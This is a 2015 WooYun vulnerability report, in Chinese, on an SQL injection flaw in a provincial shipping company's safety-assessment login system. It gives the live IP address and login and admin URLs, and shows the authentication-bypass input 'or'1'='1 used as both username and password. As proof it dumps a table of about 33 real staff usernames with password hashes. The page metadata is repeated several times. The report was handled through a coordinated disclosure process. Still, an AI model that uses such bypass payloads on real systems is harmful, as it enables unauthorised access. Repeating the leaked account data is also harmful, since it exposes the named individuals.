某省厅级部门航运公司安全管理状况评估系统存在高危SQL漏洞

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0116183

漏洞标题：某省厅级部门航运公司安全管理状况评估系统存在高危SQL漏洞

漏洞作者：朱元璋

提交时间：2015-05-26 11:54

修复时间：2015-07-14 22:04

公开时间：2015-07-14 22:04

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-05-26：细节已通知厂商并且等待厂商处理中
2015-05-30：厂商已经确认，细节仅向厂商公开
2015-06-09：细节向核心白帽子及相关领域专家公开
2015-06-19：细节向普通白帽子公开
2015-06-29：细节向实习白帽子公开
2015-07-14：细节向公众公开

简要描述：

只是因为一个低级错误，而我也在人群中多看了你一眼，从此我再也没能忘掉你的容颜.....我一直在你身边，从未走远!

详细说明：

地址http://219.159.69.133:81/ME/LOGIN.ASPX
账号： 'or'1'='1
密码: 'or'1'='1
直接进入系统

脱掉你们的裤子，看看

扫描了下你们服务器开放的端口

得到了你们的后台地址http://219.159.69.133//admin/login.aspx

漏洞证明：

随便附上一些账号信息

+------------------+---------------+
| PWD              | UserName      |
+------------------+---------------+
| 0153F7BC2A3D689D | yaodongzhen   |
| 030FE632E4761D1B | hemeixiu      |
| 0D750195B4487976 | d             |
| 19C0EDA37ADB962D | liudonghong   |
| 1DB76A3CE8457E4C | chenyusong    |
| 27D31C12883101E0 | tangcuixia    |
| 282C4809DF2A15E9 | liuzhonghong  |
| 3F631F39EE7806E0 | hedonghua     |
| 4118B9B569ACB8B6 | chenchanglin  |
| 55F18A5ABF80D47C | heguisheng    |
| 58D64161718D3C5C | liangqinglian |
| 64F2297035F3C4D6 | liangqing     |
| 680C3EEE4E47C7F6 | qinchunyan    |
| 6873D609BC4493C6 | xuxiaolian    |
| 6BDECAB3F815EC53 | xueqiong      |
| 6DDA51949C7024D2 | libinyun      |
| 72F2F98BD815EFB1 | lizhifang     |
| 7A57A5A743894A0E | admin         |
| 7C859B7A8E1AABD9 | zengyue       |
| 9AFEF4FE1D161AE4 | liping        |
| A0486FF05530DF6C | guest         |
| A8ADEF2469F3EE2A | gaoyu         |
| BCA2FC889BF5D9AA | liangfei      |
| BFCBB2C446AF9690 | ganzhaoping   |
| CF99C970445161AF | hujialing     |
| D13E43E9DA89C8FD | chenhongjun   |
| E10ADC58B0CC8D0D | fanchunhua    |
| E9B0F895A01BED3F | chencongling  |
| F03E58968C76F73C | liyongchao    |
| F22E94A7E1B867B8 | liling        |
| F6B9167D4EEB1ABF | huangfuqiang  |
| FB4B8665AEA39E00 | yuanhongyu    |
| FD7B1CD16CCE9D1D | tangbin       |
+------------------+---------------+

修复方案：

加强安全意识

版权声明：转载请注明来源朱元璋@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：11

确认时间：2015-05-30 22:02

厂商回复：

已经转由CNCERT下发给相应分中心，由其后续协调网站管理单位处置

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0116183

漏洞标题：某省厅级部门航运公司安全管理状况评估系统存在高危SQL漏洞

相关厂商：某省厅级部门航运公司

漏洞作者：朱元璋

提交时间：2015-05-26 11:54

修复时间：2015-07-14 22:04

公开时间：2015-07-14 22:04

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源朱元璋@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0116183

漏洞标题：某省厅级部门航运公司安全管理状况评估系统存在高危SQL漏洞

相关厂商：某省厅级部门航运公司

漏洞作者： 朱元璋

提交时间：2015-05-26 11:54

修复时间：2015-07-14 22:04

公开时间：2015-07-14 22:04

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0116183"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 朱元璋@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：朱元璋

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源朱元璋@乌云